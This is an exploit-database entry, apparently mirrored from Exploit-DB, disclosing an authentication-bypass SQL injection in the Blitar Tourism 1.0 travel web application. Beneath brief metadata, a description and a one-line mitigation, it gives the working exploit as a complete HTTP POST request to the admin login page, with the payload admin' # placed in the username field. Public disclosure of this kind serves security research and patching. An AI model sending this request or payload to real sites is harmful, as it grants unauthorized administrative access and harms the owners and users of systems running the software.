Blitar Tourism 1.0 - Authentication Bypass SQLi

vendor:

Blitar Tourism

by:

sigeri94

8.8

CVSS

HIGH

Authentication Bypass SQLi

CWE

Product Name: Blitar Tourism

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodeaplikasi.info:blitar_tourism:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2021

Blitar Tourism 1.0 – Authentication Bypass SQLi

An authentication bypass vulnerability exists in Blitar Tourism 1.0. An attacker can exploit this vulnerability by sending a crafted HTTP POST request with malicious SQL injection payloads in the username parameter. This can allow an attacker to bypass authentication and gain access to the application.

Mitigation:

Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Blitar Tourism 1.0 - Authentication Bypass SQLi
# Date: 13 April 2021
# Exploit Author: sigeri94
# Vendor Homepage: https://sourcecodeaplikasi.info/source-code-aplikasi-biro-travel-berbasis-web/
# Software Link: https://codeload.github.com/satndy/Aplikasi-Biro-Travel/zip/master
# Version: 1.0

POST /travel/Admin/ HTTP/1.1
Host: 192.168.186.132
Content-Length: 49
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.186.132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.186.132/travel/Admin/
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=0nr18qfifjk2f5o4kimk5ca312
Connection: close

username=admin%27+%23&password=admin&Login=Log+in